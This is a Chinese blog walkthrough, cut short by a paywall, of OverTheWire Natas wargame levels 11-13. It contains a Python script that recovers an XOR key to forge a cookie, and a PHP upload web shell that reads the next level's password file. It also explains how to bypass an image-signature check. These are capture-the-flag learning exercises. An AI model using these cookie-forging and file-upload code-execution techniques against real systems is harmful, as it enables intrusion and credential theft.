natas(11-20)

最新推荐文章于 2023-05-20 11:21:52 发布
最新推荐文章于 2023-05-20 11:21:52 发布
阅读量992 收藏
点赞数
分类专栏: natas
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_35297930/article/details/99673176
版权
natas11:同样查看源码,审计。想要得到密码,需要使showpassword设置为yes,loadData函数是将cookie的值解密还原,存储与mydata数组中,并返回mydata。而savaData函数则是将传入的参数进行编码处理,存在COOKIE[“data”]中。由此大体思路为,构造新的输入参数,是的showpassword值设置为yes,编码后得到新的data值。但完成这步,需...
摘要由CSDN通过智能技术生成

natas11:
  同样查看源码,审计。想要得到密码,需要使showpassword设置为yes,loadData函数是将cookie的值解密还原,存储与mydata数组中,并返回mydata。而savaData函数则是将传入的参数进行编码处理,存在COOKIE[“data”]中。

  由此大体思路为,构造新的输入参数,是的showpassword值设置为yes,编码后得到新的data值。但完成这步,需要知道异或操作中的key的值,而且这个值是设置好了的,所以需要逆推key值。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
python代码(代码写的丑,大佬们勿喷orz):

import json
import base64

newdefaultdata = {"showpassword":"yes","bgcolor":"#ffffff"}
defaultdata = {"showpassword":"no","bgcolor":"#ffffff"}
data = 'ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw='

def xor_encrypt(p_in ,out):
    key = ''
    text = p_in
    for i in range(len(out)):
        temp = text[i]^out[i]
        key += chr(temp)
    return key

def newdata(data):
    key = "qw8J".encode()
    text = data
    outdata =''
    for i in range(len(text)):
        outdata += chr(text[i]^key[i%len(key)])
    return outdata
    
result = xor_encrypt(json.dumps(defaultdata).replace(" ","").encode(),base64.b64decode(data))
print(result)

resultdata = base64.b64encode(newdata(json.dumps(newdefaultdata).replace(" ","").encode()).encode())
print(resultdata)

natas12:
  一个文件上传的页面,随便上传一个文件,修改了文件后缀名,阅读源码,发现并没有过滤,只是修改了文件名字,可以上传一个php文件,里面设置读取nata13的命令,上传php文件后用bp抓包,修改filename的后缀为php,访问上传的php即可得到密码。

<?php
  	system('cat /etc/natas_webpass/natas13');
?>

natas13:
  一样的上传文件的页面,但对文件进行了过滤。利用了exif_imagetype()函数,该函数是读取图像的第一个字节检查其签名是否为图片信息前面。由此我们可以在php文件中加入图片签名绕过,其余步骤与natas12相同即可。

知识补充:
一个GIF89a图形文件就是一个根据图形交换格式(GIF)89a版(1989年7 月发行

最低0.47元/天 解锁文章
半夜好饿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
natas(0-10)
半夜好饿的博客
08-15 569
写在前面的话:是的,我又开新坑了,虽然我sqli-lab的wp还有很多没写,关卡也还没闯完,但这不妨碍我开新坑,对不对!natas具体不介绍了,可以自行百度,我真的很懒的,直接写wp吧。 natas0: 要求在本页面找到下一关的密码,首先查看源码,然后就看到了密码了。 natas1: 还是要求本页找到下一关的密码,但是右击查看原码被锁了,那就快捷键呗。 natas2:   查看源码,只能看到本关的...
natas(21-27)
半夜好饿的博客
08-19 444
natas21: 本关有两个页面,一个和之前的相同,显示“You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.”,另一个好像是一个修改CSS的页面,查看第一个页面的源码,会发现和前一关相似,都是需要_SESSION[“admin”]==1才可看到下一级的密码。 加上第...
OverTheWire的natas游戏(21-34)
qq_40710190的博客
07-18 685
natas solution(21-34) Natas Level 20 → Level 21 Username: natas21 URL: http://natas21.natas.labs.overthewire.org 这一关涉及到一个共享session的知识点,算是本关的收获吧。 进入页面后看到提示 Note: this website is colocated with http://natas21-experimenter.natas.labs.overthewire.org 在看
Wargames学习笔记--Natas
weixin_42820274的博客
02-09 3725
靶场链接:https://overthewire.org/wargames/natas/natas0.html Level 0 按照题目的提示登录web页面,查看源码里获得下一级密码 Level 0 --> Level 1 登录natas1 提示禁用了右键,浏览器里选开发者选项查源码就可以了 Level 1 --> Level 2 登录natas2 页面写什么都没有,看了请求头之类的,确实什么都没有,发现源码里有一个奇怪的地方 <img src="files/pixel.png">
Natas通关指南(11-20)
蚁景网安学院
08-28 509
接上一篇Natas通关指南(1-10)继续闯关OverTheWire 是一个 wargame 网站。其中Natas是一个适合学习Web安全基础的游戏,在Natas 中,我们需要通过...
natas
02-23
win2000下的用raw socket对IP数据包监听分析的程序
网络空间安全——Wargame靶场(Natas)
weixin_44717952的博客
05-20 1179
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
OverTheWire的natas游戏(11)
qq_40710190的博客
07-04 158
natas solution(11) Username: natas11 URL: http://natas11.natas.labs.overthewire.org 全部的源码就不放上来了,实在有点多 <? $defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff"); $data = loadData($defaultdata); if(array_key_exists("bgcolor",$_REQ
Python库 | natas-1.0.2.tar.gz
03-06
《Python库natas-1.0.2:深入探索与应用》 在IT行业中,Python是一种广泛使用的开发语言,尤其在后端开发领域,它的简洁语法和强大的库支持使其成为首选。今天我们要深入探讨的是一款名为natas的Python库,其版本为...
Natas-Solutions:试图解决纳塔斯问题
03-31
Natas-Solutions-master这个压缩包很可能是包含了所有Natas挑战的解答和代码实现,对学习和复习这些知识点提供了宝贵的资源。通过深入研究和实践,你可以逐步建立起牢固的Web安全基础,并为应对更复杂的安全挑战做好...
natas:Natas Natas教授服务器端Web安全的基础知识。 每个nata级别都由位于http://natasX.natas.labs.overthewire.org上的自己的网站组成,其中X是级别编号。 没有SSH登录。 要访问某个级别,请输入该级别的用户名(例如,级别0的natas0)及其密码。 每个级别都可以访问下一个级别的密码。 您的工作是以某种方式获取下一个密码并进行升级。 所有密码也都存储在etcnatas_webpass中。 例如,natas5的密码存储在文件etcnatas_web
02-23
natas:Natas Natas教授服务器端Web安全的基础知识。 每个nata级别都由位于http://natasX.natas.labs.overthewire.org上的自己的网站组成,其中X是级别编号。 没有SSH登录。 要访问某个级别,请输入该级别的用户名...
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
"Natas-master"压缩包文件可能包含了一个Natas游戏解决方案的完整集合,包括了各个级别的解题思路和代码示例。玩家可以参考这些资源,结合自己的实践,加深对Web安全的理解。 总之,Natas游戏提供了一个理想的环境...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
python字符串与字符串抑或解析(natas11 python解法)
飞鸟的博客
03-01 403
问题描述 我在做natas11的时候发现了一个问题,问题的需求可以简化为: $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[&quot;data&quot;])), true); 其中xor_decode的实现为: function xor_encrypt($in) { $key = '&amp;lt;censored&amp;gt;'; $te...
Wargames靶场之natas(web安全)
weixin_50764099的博客
04-24 812
Natas系列包含服务器端Web安全的基础知识。每个级别的 natas 都由位于处的自己的网站组成,其中 X 是级别 数。。要访问某个级别,请输入用户名 对于该级别(例如,NATAS0 表示级别 0)及其密码。每个级别都可以访问下一级的密码。你的任务是以某种方式获取下一个密码并升级。。例如,存储 natas5 的密码 在文件 /etc/natas_webpass/natas5 中,只有 natas4 和 纳塔斯5。
natas(level0-level14)通关详细指南(一)
tempulcc的博客
09-24 2649
natas通关指南level0level1level2level3level4 很久以前玩的一个Web安全的通关游戏Natas,每一关的地址是http://natasX.natas.labs.overthewire.org,其中X代表当前关数,默认用户名是nataX(eg.natas0 是level0的用户名),通过当前的一关获取进入下一关的密码。 level0 URL: http://natas0.natas.labs.overthewire.org Username: natas0 Password:
Natas通关指南(1-10)
蚁景网安学院
08-22 755
OverTheWire 是一个 wargame 网站。其中Natas是一个适合学习Web安全基础的游戏,在Natas 中,我们需要通过找到网站的漏洞获得通往下一关的密码。每一关都有一...
natas通关小游戏(未完待续)
weixin_41023022的博客
08-23 941
地址:http://overthewire.org/wargames/natas/ level 0 -&gt; level 1 You can find the password for the next level on this page.(你可以在此界面找到下一级别的代码) 于是查看源码,发现答案在注释中 natas:gtVrDuiDfck831PqWsLEZy5gyDz1clt...
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
最新发布
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值